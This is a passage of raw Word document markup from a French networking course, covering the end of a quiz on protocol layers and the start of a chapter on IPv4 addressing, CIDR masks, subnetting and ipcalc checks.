        <w:t>Un tunnel VPN réduit souvent la MTU utile : c'est une cause fréquente de blocage sur gros paquets.</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À quelle couche se situe IP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Liaison</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Réseau</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Transport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Application</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Quel protocole garantit la livraison et l'ordre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UDP</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TCP</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ICMP</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ARP</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 fait l'encapsulation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Compresse les données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Ajoute un en-tête à chaque couche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Chiffre le trafic</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Réduit la latence</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Quel outil teste l'ouverture d'un port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ping</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nc -zv</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dig</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ip route</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 mesure la latence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Le débit maximal</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 temps d'aller-retour</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La perte de paquets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La taille des paquets</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IP est le protocole de la couche réseau (couche 3).</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TCP gère acquittements, retransmissions et séquencement.</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Chaque couche ajoute ses métadonnées puis les retire à la réception.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nc -zv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tente une connexion TCP sur le port indiqué.</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Elle s'exprime en millisecondes d'aller-retour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>55. Adressage IP, sous-réseaux et routage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Découper un réseau en blocs cohérents et comprendre pourquoi une adresse est joignable ou non.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 54</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Lire une adresse IPv4 et son masque.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Calculer un réseau, une diffusion et une plage utile.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Découper un réseau en sous-réseaux.</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Comprendre NAT et adressage privé.</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Lire et modifier une table de routage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>55.1 Une adresse, un masque</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une adresse IPv4 est un nombre de 32 bits écrit en quatre octets. Le masque indique combien de bits identifient le réseau ; les bits restants identifient l'hôte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une adresse décodée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192.168.10.42</w:t>
        <w:br/>
        <w:t>11000000.10101000.00001010.00101010</w:t>
        <w:br/>
        <w:br/>
        <w:t>Masque 255.255.255.0  =  /24</w:t>
        <w:br/>
        <w:t>11111111.11111111.11111111.00000000</w:t>
        <w:br/>
        <w:t xml:space="preserve">         réseau (24 bits)      hôtes (8 bits)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Réseau    : 192.168.10.0</w:t>
        <w:br/>
        <w:t>Premier   : 192.168.10.1</w:t>
        <w:br/>
        <w:t>Dernier   : 192.168.10.254</w:t>
        <w:br/>
        <w:t>Diffusion : 192.168.10.255</w:t>
        <w:br/>
        <w:t>Hôtes     : 254 (2^8 - 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.190 — Huit préfixes courants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16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Préfixe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Masque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="201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Adresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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Hôtes utiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1614"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/24</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255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2018"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="161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/25</w:t>
            </w:r>
          </w:p>
        </w:tc>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255.255.255.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="201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128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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126</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1614"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/26</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255.255.255.192</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2018"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="161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/27</w:t>
            </w:r>
          </w:p>
        </w:tc>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255.255.255.224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="201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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1614"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/28</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255.255.255.240</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2018"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="161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/30</w:t>
            </w:r>
          </w:p>
        </w:tc>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255.255.255.252</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="201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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1614"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/31</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255.255.255.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2018"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2422"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2 (lien point à point)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="161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/32</w:t>
            </w:r>
          </w:p>
        </w:tc>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255.255.255.255</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="201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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="242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1 (hôte seul)</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CIDR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Notation qui exprime le masque par le nombre de bits de réseau, par exemple </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>. Elle remplace les anciennes classes A, B et C.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deux adresses sont réservées dans chaque sous-réseau : celle dont tous les bits d'hôte valent 0 désigne le réseau, celle dont tous les bits valent 1 sert à la diffusion. D'où la règle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2^n - 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>55.2 Découper un réseau</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Découper un /24 en quatre /26 est l'exercice de base. Chaque sous-réseau avance de 64 adresses : on ajoute ce pas à l'adresse réseau précédente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un découpage en quatre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Réseau de départ : 192.168.10.0/24</w:t>
        <w:br/>
        <w:br/>
        <w:t>/26 → 4 sous-réseaux de 64 adresses, 62 hôtes utiles</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. 192.168.10.0/26    .1  → .62     diffusion .63</w:t>
        <w:br/>
        <w:t>2. 192.168.10.64/26   .65 → .126    diffusion .127</w:t>
        <w:br/>
        <w:t>3. 192.168.10.128/26  .129 → .190   diffusion .191</w:t>
        <w:br/>
        <w:t>4. 192.168.10.192/26  .193 → .254   diffusion .255</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Calculs rapides avec ipcalc</w:t>
        <w:br/>
        <w:t>ipcalc 192.168.10.42/26</w:t>
        <w:br/>
        <w:t>ipcalc -n 192.168.10.42/26</w:t>
        <w:br/>
        <w:t>ipcalc -r 10.0.0.0/22</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la cohérence d'un plan d'adressage</w:t>
        <w:br/>
        <w:t># /22 couvre 10.0.0.0 à 10.0.3.255 : attention aux chevauchements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.191 — Cinq tailles selon l'usage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95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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Taille conseillée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lien point à point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/30 ou /31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Deux adresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Petit service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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/28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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14 hôtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bureau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3103"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>62 hôtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Étage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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254 hôtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2955"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
